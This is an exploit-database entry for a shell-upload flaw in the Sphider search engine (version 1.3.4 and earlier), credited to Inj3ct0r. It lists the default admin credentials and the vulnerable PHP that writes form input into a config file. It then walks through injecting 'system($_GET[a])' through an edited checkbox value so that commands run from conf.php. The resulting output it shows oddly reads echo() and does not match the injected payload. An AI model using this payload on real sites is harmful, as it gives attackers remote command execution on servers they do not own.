Exploit for unknown platform in category web applications
===========================================
Sphider <= 1.3.4 shell upload vulnerability
===========================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
#[+] Discovered By : Inj3ct0r
#[+] Site : Inj3ct0r.com
#[+] support e-mail : submit[at]inj3ct0r.com
[~] Username and pass are stored in:
http://site.com/sphider/admin/auth.php
Default:
PHP code:
error_reporting(E_ERROR | E_PARSE);
$admin = "admin";
$admin_pw = "admin";
[~] filled shells.
Vulnerable code:
PHP code:
if ($_index_pdf=="") {
$_index_pdf=0;
}
...
fwrite($fhandle, "\n\n// Index pdf files\n");
fwrite($fhandle,"$"."index_pdf = ".$_index_pdf. ";");
The easiest is to do opera. Go to Source and change this:
HTML code:
<input name="_index_pdf" type="checkbox" value="0" id="index_pdf" >
so
HTML code:
<input name="_index_pdf" type="checkbox" value="0; system($_GET[a])" id="index_pdf" >
Save your settings.
As a result, we have:
PHP code:
// Index pdf files
$index_pdf = 0; echo($_GET[a]);
http://site.com/sphider/settings/conf.php?a=ls -la
# 0day.today [2018-03-01] #